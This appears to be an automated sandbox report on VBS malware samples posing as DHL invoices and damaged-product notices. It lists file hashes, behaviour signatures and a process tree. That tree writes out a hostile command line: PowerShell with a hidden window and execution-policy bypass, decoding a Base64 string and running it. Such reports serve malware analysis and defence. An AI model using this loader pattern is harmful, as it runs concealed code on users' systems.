Overview

Tasks (score / sample / platform):
  10  static                  (static analysis)
   1  DHL-INVOIC...09.vbs     windows7-x64
   8  DHL-INVOIC...09.vbs     windows10-2004-x64
  10  Damage product 1.vbs    windows7-x64
   8  Damage product 1.vbs    windows10-2004-x64
  10  Damage product 2.vbs    windows7-x64
   8  Damage product 2.vbs    windows10-2004-x64
  10  Damage product 3.vbs    windows7-x64
   8  Damage product 3.vbs    windows10-2004-x64
Analysis (score 10)
  Max time kernel:   121s
  Max time network:  122s
  Platform:          windows7_x64
  Resource:          win7-20240903-en
  Resource tags:     arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
  Submitted:         07/03/2025, 05:37
Tasks
  static1      Static task
  behavioral1  Behavioral task   Sample: DHL-INVOICE_10094519030720250009.vbs   Resource: win7-20240903-en
  behavioral2  Behavioral task   Sample: DHL-INVOICE_10094519030720250009.vbs   Resource: win10v2004-20250217-en
  behavioral3  Behavioral task   Sample: Damage product 1.vbs                   Resource: win7-20241010-en
  behavioral4  Behavioral task   Sample: Damage product 1.vbs                   Resource: win10v2004-20250217-en
  behavioral5  Behavioral task   Sample: Damage product 2.vbs                   Resource: win7-20240903-en
  behavioral6  Behavioral task   Sample: Damage product 2.vbs                   Resource: win10v2004-20250217-en
  behavioral7  Behavioral task   Sample: Damage product 3.vbs                   Resource: win7-20240903-en
General
  Target:  Damage product 3.vbs
  Size:    98KB
  MD5:     540e4bf8702b547df9e3868c10ac3af5
  SHA1:    e0e0ff304f3b373b285dc405f3eb44f03c2b989e
  SHA256:  de17c28e65d85e092109368925d9e27f51cb79c01cf4526011cfec863462e1af
  SHA512:  cbba98c3aa544380167e1a39d6232187c215a2432009666ad04db0d4fccba6c5f3dfc8d797b9916ab0fb4dcad149e54b899d00eb1268e99d442c34ce6e9d54a6
  SSDEEP:  3072:SMEJk61R5X/jMrkaQlPYvEIX3eUfiRwle2TfjH:p8/RaQ9wrXuUfi2TfjH
Malware Config
Signatures
  Command and Scripting Interpreter: PowerShell (1 TTP, 1 IoC)
    Run PowerShell and hide display window.
      PID   Process
      2804  powershell.exe
  Enumerates physical storage devices (1 TTP)
    Attempts to interact with connected storage/optical drive(s).
  System Location Discovery: System Language Discovery (1 TTP, 1 IoC)
    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
      Description  IoC                                                            Process
      Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language   powershell.exe
  Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoC)
      PID   Process
      2804  powershell.exe
  Suspicious behavior: EnumeratesProcesses (1 IoC)
      PID   Process
      2804  powershell.exe
  Suspicious use of AdjustPrivilegeToken (1 IoC)
      Description              PID   Process
      Token: SeDebugPrivilege  2804  powershell.exe
  Suspicious use of WriteProcessMemory (10 IoCs)
      Description                        PID   Process      procid_target
      PID 2736 wrote to memory of 2828   2736  WScript.exe  30
      PID 2736 wrote to memory of 2828   2736  WScript.exe  30
      PID 2736 wrote to memory of 2828   2736  WScript.exe  30
      PID 2828 wrote to memory of 2980   2828  cmd.exe      32
      PID 2828 wrote to memory of 2980   2828  cmd.exe      32
      PID 2828 wrote to memory of 2980   2828  cmd.exe      32
      PID 2980 wrote to memory of 2804   2980  cmd.exe      34
      PID 2980 wrote to memory of 2804   2980  cmd.exe      34
      PID 2980 wrote to memory of 2804   2980  cmd.exe      34
      PID 2980 wrote to memory of 2804   2980  cmd.exe      34
Processes (process tree, depth shown by indentation)
  [1] C:\Windows\System32\WScript.exe  (PID 2736)
      Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Damage product 3.vbs"
      - Suspicious use of WriteProcessMemory
    [2] C:\Windows\System32\cmd.exe  (PID 2828)
        Command line: cmd /c ""C:\Users\Admin\AppData\Local\Temp\zlsfPZ.bat" "
        - Suspicious use of WriteProcessMemory
      [3] C:\Windows\system32\cmd.exe  (PID 2980)
          Command line: C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\zlsfPZ.bat"
          - Suspicious use of WriteProcessMemory
        [4] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  (PID 2804)
            Command line: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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')) | Invoke-Expression"
            - Command and Scripting Interpreter: PowerShell
            - System Location Discovery: System Language Discovery
            - Suspicious behavior: CmdExeWriteProcessMemorySpam
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v15
Downloads
  Filesize:  88KB
  MD5:       256444260f4883588278d45371a49e19
  SHA1:      9037eecde41b28d23f45127b6cb59c40bf2e5124
  SHA256:    4c2c6abf901520384cdb3b5c9074055fe49c9bd67df2da7a797745927f13a92a
  SHA512:    9b0214afe7c9f76041210f2a39e1cdd58d4bdad4f8c59f091ad56343416adc06ad13870c1e03cb40cc71651353ab3776376bd7bc41bf1e8ac5e096afab053789